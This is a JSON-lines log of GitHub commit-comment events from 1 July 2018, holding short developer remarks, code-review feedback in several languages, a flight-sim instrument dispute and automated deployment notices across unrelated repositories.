{"id":"7903394566","type":"CommitCommentEvent","actor":{"login":"vecchiotom"},"repo":{"name":"citizenfx/fivem"},"payload":{"comment":{"id":29558828,"position":null,"line":null,"path":null,"commit_id":"55d9b6789ed93a81f3ca80c67b7a2ff5923a112d","created_at":"2018-07-01T17:39:30Z","updated_at":"2018-07-01T17:39:30Z","author_association":"NONE","body":"thanks."}},"created_at":"2018-07-01T17:39:30Z"}
{"id":"7903395204","type":"CommitCommentEvent","actor":{"login":"DanielMaritim"},"repo":{"name":"DanielMaritim/DanielMaritim.github.io"},"payload":{"comment":{"id":29558830,"position":null,"line":null,"path":null,"commit_id":"2f9aaf179f01ecbfb07ea11b3995a6575c7cafb0","created_at":"2018-07-01T17:39:58Z","updated_at":"2018-07-01T17:39:58Z","author_association":"OWNER","body":"It a currency convertor that runs offline."}},"created_at":"2018-07-01T17:39:58Z"}
{"id":"7903395505","type":"CommitCommentEvent","actor":{"login":"gilbertohasnofb"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558831,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T17:40:12Z","updated_at":"2018-07-01T17:40:12Z","author_association":"COLLABORATOR","body":"@wkitty42 You might have missed my message above, please do take a look. 1) our AI is based on a gauge model used in the model P and I am not happy changing it as I did take quite some time researching and creating what we currently have and 2) this whole discussion is way off-topic here "}},"created_at":"2018-07-01T17:40:12Z"}
{"id":"7903396465","type":"CommitCommentEvent","actor":{"login":"AndreyKirichenko"},"repo":{"name":"AndreyKirichenko/ror_beginner"},"payload":{"comment":{"id":29558832,"position":65,"line":87,"path":"lesson_4/main.rb","commit_id":"d21bd1f2c9a9b1494930ef1a3688eed65fa20775","created_at":"2018-07-01T17:40:56Z","updated_at":"2018-07-01T17:40:56Z","author_association":"OWNER","body":"нельзя, вызываются приватные методы!"}},"created_at":"2018-07-01T17:40:56Z"}
{"id":"7903396713","type":"CommitCommentEvent","actor":{"login":"catull"},"repo":{"name":"krader1961/ast"},"payload":{"comment":{"id":29558833,"position":null,"line":null,"path":null,"commit_id":"8c0a82cd71ac4f73dc07b22af882a8964c5a6340","created_at":"2018-07-01T17:41:07Z","updated_at":"2018-07-01T17:41:07Z","author_association":"NONE","body":"@krader1961 \r\nInteresting, I can use meson-0.46.1 (built it with python 3.6.6) with macOS X 10.13.5.\r\n\r\nI do not use `homebrew` though.\r\n"}},"created_at":"2018-07-01T17:41:07Z"}
{"id":"7903397014","type":"CommitCommentEvent","actor":{"login":"cthoyt"},"repo":{"name":"scolby33/OCSPdash"},"payload":{"comment":{"id":29558834,"position":7,"line":52,"path":"src/ocspdash/ocspscrape.py","commit_id":"89715290b0757a6d20fef932ef0b4a585bea6e78","created_at":"2018-07-01T17:41:20Z","updated_at":"2018-07-01T17:41:20Z","author_association":"COLLABORATOR","body":"@scolby33 set the API version as a configuration item as well"}},"created_at":"2018-07-01T17:41:20Z"}
{"id":"7903397228","type":"CommitCommentEvent","actor":{"login":"marcusjmiller"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29558835,"position":null,"line":null,"path":null,"commit_id":"0a84cebda2c38afa8a355471be934399d5ffef9c","created_at":"2018-07-01T17:41:29Z","updated_at":"2018-07-01T17:41:29Z","author_association":"COLLABORATOR","body":"Very nice. Love the lines!"}},"created_at":"2018-07-01T17:41:29Z"}
{"id":"7903397354","type":"CommitCommentEvent","actor":{"login":"cthoyt"},"repo":{"name":"scolby33/OCSPdash"},"payload":{"comment":{"id":29558836,"position":null,"line":null,"path":null,"commit_id":"89715290b0757a6d20fef932ef0b4a585bea6e78","created_at":"2018-07-01T17:41:35Z","updated_at":"2018-07-01T17:41:35Z","author_association":"COLLABORATOR","body":"This was a good idea"}},"created_at":"2018-07-01T17:41:35Z"}
{"id":"7903398672","type":"CommitCommentEvent","actor":{"login":"it0uchpods"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558840,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T17:42:30Z","updated_at":"2018-07-01T17:42:30Z","author_association":"CONTRIBUTOR","body":"Honestly, I still think it looks unrealistic, and the 3D model is still not right. I found this instrument a while ago, the 3D is alright, but the next needs some improvement. Perhaps it can be adapted?\r\nhttp://i.prntscr.com/oofH7UzXRqqLUDeCK7ZP0Q.png\r\n\r\nI would help if I could, but I am useless in 3D modelling.\r\n\r\nJ"}},"created_at":"2018-07-01T17:42:30Z"}
{"id":"7903399685","type":"CommitCommentEvent","actor":{"login":"Nekliukov"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29558841,"position":41,"line":41,"path":"NET.S.2018.Nekliukov.03/MathsExtension/Operations.cs","commit_id":"37c486bf8de330cdb4a8ffc9f100b7d2fcd20be1","created_at":"2018-07-01T17:43:15Z","updated_at":"2018-07-01T17:43:15Z","author_association":"OWNER","body":"Добрый вечер, большое спасибо за замечания, всё исправил, только тесты не\r\nтрогал, со следующим Day перейду на NUnit)\r\n\r\n2018-07-01 19:43 GMT+03:00 Anzhelika Kravchuk <notifications@github.com>:\r\n\r\n>\r\n>    - это черновой коментарий, перед комитом такие надо убирать\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/Nekliukov/NET.S.2018.Nekliukov/commit/37c486bf8de330cdb4a8ffc9f100b7d2fcd20be1#commitcomment-29558669>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AdQLrPPFO4SpwWtr53ZGsLHnYI6dCPo_ks5uCPwvgaJpZM4U-Ytd>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-01T17:43:15Z"}
{"id":"7903400902","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29558842,"position":null,"line":null,"path":null,"commit_id":"0a84cebda2c38afa8a355471be934399d5ffef9c","created_at":"2018-07-01T17:44:08Z","updated_at":"2018-07-01T17:44:08Z","author_association":"OWNER","body":"The image is borderline overexposed, but as I look at it, I find that I like the bleakness. The white/blue buildings and the white/blue sky create a kind of stark, alien harshness. The place IS a purgatory. In the end, when they have the family reunion picnic, we probably want richer greens and white red and blues. And individual tenants' units may have their own color palettes. But the storage yard itself looks about right to me in that still. "}},"created_at":"2018-07-01T17:44:08Z"}
{"id":"7903401772","type":"CommitCommentEvent","actor":{"login":"RenderBroken"},"repo":{"name":"joshuous/android_kernel_oneplus_msm8998"},"payload":{"comment":{"id":29558844,"position":null,"line":null,"path":null,"commit_id":"ae663494a4062b662ccd7d8a7502fedc2e50b431","created_at":"2018-07-01T17:44:42Z","updated_at":"2018-07-01T17:44:42Z","author_association":"COLLABORATOR","body":"Do we want this in our release? Have not tested it personally."}},"created_at":"2018-07-01T17:44:42Z"}
{"id":"7903405342","type":"CommitCommentEvent","actor":{"login":"Nekliukov"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29558849,"position":41,"line":41,"path":"NET.S.2018.Nekliukov.03/MathsExtension/Operations.cs","commit_id":"37c486bf8de330cdb4a8ffc9f100b7d2fcd20be1","created_at":"2018-07-01T17:47:23Z","updated_at":"2018-07-01T17:47:23Z","author_association":"OWNER","body":"PS: там случайно два одинаковых по названию коммита, но с разным\r\nсодержимым, все относятся к исправлению ошибок\r\n\r\n1 июля 2018 г., 20:43 пользователь Roman Neliukov <roman.nekliukov@gmail.com\r\n> написал:\r\n\r\n> Добрый вечер, большое спасибо за замечания, всё исправил, только тесты не\r\n> трогал, со следующим Day перейду на NUnit)\r\n>\r\n> 2018-07-01 19:43 GMT+03:00 Anzhelika Kravchuk <notifications@github.com>:\r\n>\r\n>>\r\n>>    - это черновой коментарий, перед комитом такие надо убирать\r\n>>\r\n>> —\r\n>> You are receiving this because you authored the thread.\r\n>> Reply to this email directly, view it on GitHub\r\n>> <https://github.com/Nekliukov/NET.S.2018.Nekliukov/commit/37c486bf8de330cdb4a8ffc9f100b7d2fcd20be1#commitcomment-29558669>,\r\n>> or mute the thread\r\n>> <https://github.com/notifications/unsubscribe-auth/AdQLrPPFO4SpwWtr53ZGsLHnYI6dCPo_ks5uCPwvgaJpZM4U-Ytd>\r\n>> .\r\n>>\r\n>\r\n>\r\n"}},"created_at":"2018-07-01T17:47:23Z"}
{"id":"7903406827","type":"CommitCommentEvent","actor":{"login":"MrHunterZhao"},"repo":{"name":"MrHunterZhao/HotSpotSourceCodeExploration"},"payload":{"comment":{"id":29558852,"position":null,"line":null,"path":null,"commit_id":"0c93ad824dca27277eb2d12fc1b06d562be7fc4e","created_at":"2018-07-01T17:48:31Z","updated_at":"2018-07-01T17:48:31Z","author_association":"OWNER","body":"文章地址：https://hunterzhao.io/post/2018/05/20/hotspot-explore-thread-model/"}},"created_at":"2018-07-01T17:48:31Z"}
{"id":"7903408482","type":"CommitCommentEvent","actor":{"login":"ashishpatel0720"},"repo":{"name":"ashishpatel0720/jetbrains_settings"},"payload":{"comment":{"id":29558855,"position":null,"line":null,"path":null,"commit_id":"1930aa5cc7220e7fe2c179aea90a2e161375cb17","created_at":"2018-07-01T17:49:50Z","updated_at":"2018-07-01T17:49:50Z","author_association":"OWNER","body":"ctrl+a and meta+a are added for select all"}},"created_at":"2018-07-01T17:49:50Z"}
{"id":"7903408514","type":"CommitCommentEvent","actor":{"login":"olkaprogrammist"},"repo":{"name":"polynaris/homework-3-js"},"payload":{"comment":{"id":29558856,"position":null,"line":null,"path":null,"commit_id":"afbabfce47716df6a3a992cce1f0de5c9d9af3ab","created_at":"2018-07-01T17:49:52Z","updated_at":"2018-07-01T17:49:52Z","author_association":"NONE","body":"Отлично"}},"created_at":"2018-07-01T17:49:52Z"}
{"id":"7903408887","type":"CommitCommentEvent","actor":{"login":"wkitty42"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558857,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T17:50:09Z","updated_at":"2018-07-01T17:50:09Z","author_association":"CONTRIBUTOR","body":"On 07/01/2018 01:37 PM, wkitty42@gmail.com wrote:\n> so, i've done this...\n\n\njust see issue #1139... it is easier over there since i can't find this \ndiscussion in the issues and stuff...\n\n"}},"created_at":"2018-07-01T17:50:09Z"}
{"id":"7903410329","type":"CommitCommentEvent","actor":{"login":"krader1961"},"repo":{"name":"krader1961/ast"},"payload":{"comment":{"id":29558861,"position":null,"line":null,"path":null,"commit_id":"8c0a82cd71ac4f73dc07b22af882a8964c5a6340","created_at":"2018-07-01T17:51:14Z","updated_at":"2018-07-01T17:51:14Z","author_association":"OWNER","body":"@catull The failure only occurs with python 3.7 which made `raise StopIteration` in a generator illegal. It had been deprecated for quite a while. See https://www.python.org/dev/peps/pep-0479/. I didn't know about this until for no obvious reasons the macOS Travis environment started failing to build yesterday while the day before it was fine."}},"created_at":"2018-07-01T17:51:14Z"}
{"id":"7903410662","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29558862,"position":null,"line":null,"path":null,"commit_id":"18f3b6e3e6d402ea7093b02499cf94a37c868dfd","created_at":"2018-07-01T17:51:33Z","updated_at":"2018-07-01T17:51:33Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-175132 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-175132\") to [dev](https://console.bluemix.net/apps/cfd9493a-e253-4693-8349-434c585d19ed?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-01T17:51:33Z"}
{"id":"7903412384","type":"CommitCommentEvent","actor":{"login":"kirill-u"},"repo":{"name":"epam-js-may-2018/homework-4-js"},"payload":{"comment":{"id":29558867,"position":13,"line":4,"path":"utils.js","commit_id":"a4cd09c8fc6710545acfc61211ae84225b2a9240","created_at":"2018-07-01T17:52:57Z","updated_at":"2018-07-01T17:52:57Z","author_association":"NONE","body":"You should use `map` if you transform array.  In this case i don't see any transformation with the array. Read [this article](https://learn.javascript.ru/array-iteration) for more information."}},"created_at":"2018-07-01T17:52:57Z"}
{"id":"7903413502","type":"CommitCommentEvent","actor":{"login":"gilbertohasnofb"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558868,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T17:53:45Z","updated_at":"2018-07-01T17:53:45Z","author_association":"COLLABORATOR","body":"> Honestly, I still think it looks unrealistic\r\n\r\n'Unrealistic' is just an umbrella term that the flightsim community loves. You either open a new issue pointing something concrete or this is a non-discussion. As for the old model, we _decided_ to use a new one because it looked better (at least in my opinion) and were the model used by most model P's in our research. I am sorry but I am not reverting that."}},"created_at":"2018-07-01T17:53:45Z"}
{"id":"7903413799","type":"CommitCommentEvent","actor":{"login":"g10r"},"repo":{"name":"Bloomberg-Beta/Manual"},"payload":{"comment":{"id":29558869,"position":null,"line":null,"path":null,"commit_id":"caa6c0933f88e062d0909283d77084d4faf39d41","created_at":"2018-07-01T17:53:59Z","updated_at":"2018-07-01T17:53:59Z","author_association":"NONE","body":"Personally organized and began meeting with a group (~7) CEOs here in LA on a monthly basis. The result has been nothing short of incredible, both my business and state of mind are better off."}},"created_at":"2018-07-01T17:53:59Z"}
{"id":"7903415937","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Siaukovich/NET.S.2018.Siaukovich.03"},"payload":{"comment":{"id":29558873,"position":32,"line":32,"path":"FindNthRoot/ApproximateMath.cs","commit_id":"3c442795c00ae5c36eb60deb0bc89c5f15b6ec72","created_at":"2018-07-01T17:55:39Z","updated_at":"2018-07-01T17:55:39Z","author_association":"NONE","body":"Такой while возможен, но не очень очевиден, я условие на погрешность порекомендовала бы написать сюда."}},"created_at":"2018-07-01T17:55:39Z"}
{"id":"7903416057","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Siaukovich/NET.S.2018.Siaukovich.03"},"payload":{"comment":{"id":29558874,"position":61,"line":61,"path":"FindNthRoot/ApproximateMath.cs","commit_id":"3c442795c00ae5c36eb60deb0bc89c5f15b6ec72","created_at":"2018-07-01T17:55:45Z","updated_at":"2018-07-01T17:55:45Z","author_association":"NONE","body":"Думаю, что такого рода описание для приватных методов (этот и ниже) являются все-таки лишними, мы получаем о них информацию, как минимум, в Object Browser-е. Кроме того, информация о возможных исключениях (метод ThrowForInvalidParameters) нужна больше публичному методу, а ее у него нет."}},"created_at":"2018-07-01T17:55:45Z"}
{"id":"7903416299","type":"CommitCommentEvent","actor":{"login":"it0uchpods"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558875,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T17:55:58Z","updated_at":"2018-07-01T17:55:58Z","author_association":"CONTRIBUTOR","body":"Unrealistic means something does not look as the real one does. If you don't want to revert it, maybe improve it? Shouldn't you strive for realism?\r\n\r\nAlso, don't really know if this is the same instrument, as I pulled it from somewhere else. I don't know if it was ever in the c172p or not."}},"created_at":"2018-07-01T17:55:58Z"}
{"id":"7903416566","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Siaukovich/NET.S.2018.Siaukovich.03"},"payload":{"comment":{"id":29558876,"position":94,"line":94,"path":"FindNthRoot/ApproximateMath.cs","commit_id":"3c442795c00ae5c36eb60deb0bc89c5f15b6ec72","created_at":"2018-07-01T17:56:10Z","updated_at":"2018-07-01T17:56:10Z","author_association":"NONE","body":" if (epsilon <= 0 || epsilon >= 1)"}},"created_at":"2018-07-01T17:56:10Z"}
{"id":"7903417119","type":"CommitCommentEvent","actor":{"login":"kirill-u"},"repo":{"name":"epam-js-may-2018/homework-4-js"},"payload":{"comment":{"id":29558877,"position":null,"line":null,"path":null,"commit_id":"a4cd09c8fc6710545acfc61211ae84225b2a9240","created_at":"2018-07-01T17:56:36Z","updated_at":"2018-07-01T17:56:36Z","author_association":"NONE","body":"Thank you for code style 👍. "}},"created_at":"2018-07-01T17:56:36Z"}
{"id":"7903417575","type":"CommitCommentEvent","actor":{"login":"kirill-u"},"repo":{"name":"epam-js-may-2018/homework-3-js"},"payload":{"comment":{"id":29558878,"position":null,"line":null,"path":null,"commit_id":"fd725482f199ca54131fa29c111acc6338d43b54","created_at":"2018-07-01T17:56:57Z","updated_at":"2018-07-01T17:56:57Z","author_association":"NONE","body":"Thank you for code style 👍. "}},"created_at":"2018-07-01T17:56:57Z"}
{"id":"7903418462","type":"CommitCommentEvent","actor":{"login":"vtavernier"},"repo":{"name":"vtavernier/efiboot-rs"},"payload":{"comment":{"id":29558881,"position":39,"line":39,"path":".travis.yml","commit_id":"7ce6d591c1c5896d7ffba5c56d4fa696a19fea13","created_at":"2018-07-01T17:57:39Z","updated_at":"2018-07-01T17:57:39Z","author_association":"OWNER","body":"Thanks for the input! I tried that solution too but if I remember correctly the built kcov was not being cached, which caused it to be rebuilt on every push to this repository. With this approach I explicitly cache the build kcov in $HOME, which shortens the build time a bit. However I'm all for a pure-cargo-make solution if there's one!"}},"created_at":"2018-07-01T17:57:39Z"}
{"id":"7903419758","type":"CommitCommentEvent","actor":{"login":"Sora92"},"repo":{"name":"k0np4ku/Azur-Lane-Scripts-Autopatcher"},"payload":{"comment":{"id":29558884,"position":null,"line":null,"path":null,"commit_id":"6f6df91c3c403a27d856a374f82d3cc8f413e9ad","created_at":"2018-07-01T17:58:37Z","updated_at":"2018-07-01T17:58:37Z","author_association":"NONE","body":"Got the same thing like last time \r\n[Logs.txt](https://github.com/k0np4ku/Azur-Lane-Scripts-Autopatcher/files/2153016/Logs.txt)\r\nI have installed python 3.7 64bits and have activated net framework 3.5 but it's still not working :(\r\n"}},"created_at":"2018-07-01T17:58:37Z"}
{"id":"7903419885","type":"CommitCommentEvent","actor":{"login":"hermansusandy"},"repo":{"name":"hermansusandy/lecture0"},"payload":{"comment":{"id":29558885,"position":1,"line":1,"path":"hello.html","commit_id":"4e193c3b5a06ff6c1d471d7db666340dbcf6a2c3","created_at":"2018-07-01T17:58:42Z","updated_at":"2018-07-01T17:58:42Z","author_association":"OWNER","body":"asdasdasdasd"}},"created_at":"2018-07-01T17:58:42Z"}
{"id":"7903420101","type":"CommitCommentEvent","actor":{"login":"panospost"},"repo":{"name":"panospost/mocker"},"payload":{"comment":{"id":29558887,"position":null,"line":null,"path":null,"commit_id":"06d777431c631e42f65bc07724569e15745cddfb","created_at":"2018-07-01T17:58:51Z","updated_at":"2018-07-01T17:58:51Z","author_association":"OWNER","body":"mit licence"}},"created_at":"2018-07-01T17:58:51Z"}
{"id":"7903421705","type":"CommitCommentEvent","actor":{"login":"kirill-u"},"repo":{"name":"epam-js-may-2018/homework-3-js"},"payload":{"comment":{"id":29558892,"position":9,"line":4,"path":"utils.js","commit_id":"fd725482f199ca54131fa29c111acc6338d43b54","created_at":"2018-07-01T18:00:00Z","updated_at":"2018-07-01T18:00:00Z","author_association":"NONE","body":"you can simply \r\n```js\r\n.map(word => word.split('').join(separator))\r\n```"}},"created_at":"2018-07-01T18:00:00Z"}
{"id":"7903422694","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29558899,"position":null,"line":null,"path":null,"commit_id":"ff62a8cfab5e80d5cc7f362278451a9e7f665a0b","created_at":"2018-07-01T18:00:33Z","updated_at":"2018-07-01T18:00:33Z","author_association":"OWNER","body":"![fog distance](https://user-images.githubusercontent.com/11696990/42137240-4ab37e08-7d69-11e8-9e93-1c53febe0a56.png)\r\n\r\n```\r\n# Mandelbulber settings file\r\n# version 2.14\r\n# only modified parameters\r\n[main_parameters]\r\nbackground_color_2 4300 1600 a500;\r\ncamera 0,7094296922362218 -2,782713040748273 0,6277002680325223;\r\ncamera_distance_to_target 3,513256165102178;\r\ncamera_rotation 14,3024173175824 -12,3297811745338 4,229436948685978;\r\ncamera_top 0,01885590679087855 0,2245754900310498 0,9742742447875791;\r\nDE_factor 0,25;\r\nfile_background /usr/share/mandelbulber2/textures/background4.jpg;\r\nflight_last_to_render 0;\r\nfog_color_1 4500 7500 1d00;\r\nfog_color_2 da00 ff00 1d00;\r\nfog_color_3 ca00 2900 ff00;\r\nkeyframe_last_to_render 0;\r\nmat1_is_defined true;\r\nraytraced_reflections true;\r\ntarget -0,1384660483708238 0,5431282094886911 -0,1225141499248524;\r\nview_distance_max 9,510759588593551;\r\nvolumetric_fog_colour_1_distance 0,25;\r\nvolumetric_fog_colour_2_distance 0,0078125;\r\nvolumetric_fog_density 4;\r\nvolumetric_fog_distance_factor 0,0009765625;\r\nvolumetric_fog_distance_from_surface 0,08346951530002431;\r\nvolumetric_fog_enabled true;\r\n```"}},"created_at":"2018-07-01T18:00:33Z"}
{"id":"7903424018","type":"CommitCommentEvent","actor":{"login":"CZechBoY"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29558900,"position":null,"line":null,"path":null,"commit_id":"bbde53774abe7f2f588cda83241abcf771835498","created_at":"2018-07-01T18:01:26Z","updated_at":"2018-07-01T18:01:26Z","author_association":"CONTRIBUTOR","body":"@Majkl578 Or overriding constant with other type than defined in parent."}},"created_at":"2018-07-01T18:01:26Z"}
{"id":"7903425789","type":"CommitCommentEvent","actor":{"login":"Ghrull"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29558904,"position":null,"line":null,"path":null,"commit_id":"d619dc65f08e515e2c86b8e7ba2cc4e2191f266a","created_at":"2018-07-01T18:02:40Z","updated_at":"2018-07-01T18:02:40Z","author_association":"NONE","body":"@Destiny609  Buenas, quería preguntarte como estas al tanto de las nuevas cosas que añaden en rimword, me refiero a si añaden, quitan o cambian alguna linea de algún archivo. Es que estoy traduciendo la versión española y e visto que algunos archivos que acababa de traducir ahora tienen nuevas lineas (lo mire comparando la versión española con la latina y alemana). Un saludo¡¡"}},"created_at":"2018-07-01T18:02:40Z"}
{"id":"7903426638","type":"CommitCommentEvent","actor":{"login":"wlbragg"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558907,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T18:03:14Z","updated_at":"2018-07-01T18:03:14Z","author_association":"COLLABORATOR","body":"@it0uchpods I think what @gilbertohasnofb is trying to say is give us something concrete, specific. Is it the color, or the mechanism, ie: animation?\r\nThe last three instruments I modified at @gilbertohasnofb suggestion is because he gave me a specific example of what he considered incorrect and what needed modified.\r\nIt made it a lot easier."}},"created_at":"2018-07-01T18:03:14Z"}
{"id":"7903427204","type":"CommitCommentEvent","actor":{"login":"CarvellWakeman"},"repo":{"name":"CarvellWakeman/OffToVega"},"payload":{"comment":{"id":29558909,"position":null,"line":null,"path":null,"commit_id":"7071b5ee4158fdf318bb25efa8c4dc47b4f82b6e","created_at":"2018-07-01T18:03:38Z","updated_at":"2018-07-01T18:03:38Z","author_association":"OWNER","body":"These need to be changed into GitHub issues"}},"created_at":"2018-07-01T18:03:38Z"}
{"id":"7903428714","type":"CommitCommentEvent","actor":{"login":"gilbertohasnofb"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558910,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T18:04:41Z","updated_at":"2018-07-01T18:04:41Z","author_association":"COLLABORATOR","body":"> Unrealistic means something does not look as the real one does. If you don't want to revert it, maybe improve it? Shouldn't you strive for realism?\r\n\r\nYou must be joking if you are suggesting I don't care for realism. What I am complaining is about your generic criticism instead of specific ones.\r\n\r\n> Also, don't really know if this is the same instrument, as I pulled it from somewhere else. I don't know if it was ever in the c172p or not.\r\n\r\nOh please, have you bothered opening the links I sent you? Here they are again:\r\n\r\nhttp://imgproc.airliners.net/photos/airliners/0/6/9/0595960.jpg?v=v40\r\nhttp://imgproc.airliners.net/photos/airliners/5/9/9/1774995.jpg?v=v40\r\nhttp://imgproc.airliners.net/photos/airliners/1/3/7/4811731.jpg?v=v42736419921\r\nhttp://imgproc.airliners.net/photos/airliners/0/5/3/2695350.jpg?v=v40\r\nhttp://imgproc.airliners.net/photos/airliners/3/3/0/2558033.jpg?v=v40\r\n\r\nAll from model P's as I explained...."}},"created_at":"2018-07-01T18:04:41Z"}
{"id":"7903429576","type":"CommitCommentEvent","actor":{"login":"oCanna"},"repo":{"name":"CTCaer/hekate"},"payload":{"comment":{"id":29558911,"position":null,"line":null,"path":null,"commit_id":"3e35d99a3b02512bd70b5e11c46f21297c5c95f7","created_at":"2018-07-01T18:05:21Z","updated_at":"2018-07-01T18:05:21Z","author_association":"NONE","body":"Congrats on the 3.0 rls and thank you, naehrwert and everyone involved for your work."}},"created_at":"2018-07-01T18:05:21Z"}
{"id":"7903431250","type":"CommitCommentEvent","actor":{"login":"rugk"},"repo":{"name":"showdownjs/showdown"},"payload":{"comment":{"id":29558912,"position":null,"line":null,"path":null,"commit_id":"63d949f7312b4cd74bbf21a2d31e5c59d94bddd2","created_at":"2018-07-01T18:06:37Z","updated_at":"2018-07-01T18:06:37Z","author_association":"NONE","body":"\"Â«Â«Â«\"?? I guess there was some encoding error… Probably you meant something like `–`?"}},"created_at":"2018-07-01T18:06:37Z"}
{"id":"7903431987","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":29558913,"position":24,"line":6552,"path":"Documentation/magit.org","commit_id":"1e2f1686a16bbe05c12b59fb313d72486460c8ae","created_at":"2018-07-01T18:07:11Z","updated_at":"2018-07-01T18:07:11Z","author_association":"MEMBER","body":"Thanks for the fixes and this change is okay too - probably an improvement even. I think I actually started out writing \"There are ...\" and then stopped because I always feel a big funny about that phrasing. \"There are...\" -- I think I would never use a (somewhat) literal translation of that in German (\"es gibt\", though \"es existieren\", which comes closer to what I actually wrote, isn't much better). \" It just sounds very unimaginative, reaching for one of the verbs that can be used to mean so many different things."}},"created_at":"2018-07-01T18:07:11Z"}
{"id":"7903432449","type":"CommitCommentEvent","actor":{"login":"eclipseo"},"repo":{"name":"jarun/pdd"},"payload":{"comment":{"id":29558914,"position":null,"line":null,"path":null,"commit_id":"2344deb7e5b465fddb2df054a9078119a59bd70d","created_at":"2018-07-01T18:07:29Z","updated_at":"2018-07-01T18:07:29Z","author_association":"NONE","body":"It is done for Fedora."}},"created_at":"2018-07-01T18:07:29Z"}
{"id":"7903434005","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29558916,"position":null,"line":null,"path":null,"commit_id":"715fda8f05e076f2dd91a1ce5d31d602db486a16","created_at":"2018-07-01T18:08:42Z","updated_at":"2018-07-01T18:08:42Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-180841 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-180841\") to [dev](https://console.bluemix.net/apps/7337cf11-d4a5-4bdc-b44a-a0dd0a9e25d1?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-01T18:08:42Z"}
{"id":"7903434279","type":"CommitCommentEvent","actor":{"login":"timoline"},"repo":{"name":"ToSa27/d3-MQTT-Topic-Tree"},"payload":{"comment":{"id":29558917,"position":null,"line":null,"path":null,"commit_id":"bd71cf7bdb92ced529f1c4252922a14fb675cf43","created_at":"2018-07-01T18:08:56Z","updated_at":"2018-07-01T18:08:56Z","author_association":"NONE","body":"ah yeah, goodpoint"}},"created_at":"2018-07-01T18:08:56Z"}
{"id":"7903434308","type":"CommitCommentEvent","actor":{"login":"TheStrechh"},"repo":{"name":"Juanan557/android_device_xiaomi_rosy"},"payload":{"comment":{"id":29558918,"position":null,"line":null,"path":null,"commit_id":"3995b67bf8a2ec928e95a2b53e3807945b07a205","created_at":"2018-07-01T18:08:57Z","updated_at":"2018-07-01T18:08:57Z","author_association":"NONE","body":"DECAPRED\r\n"}},"created_at":"2018-07-01T18:08:57Z"}
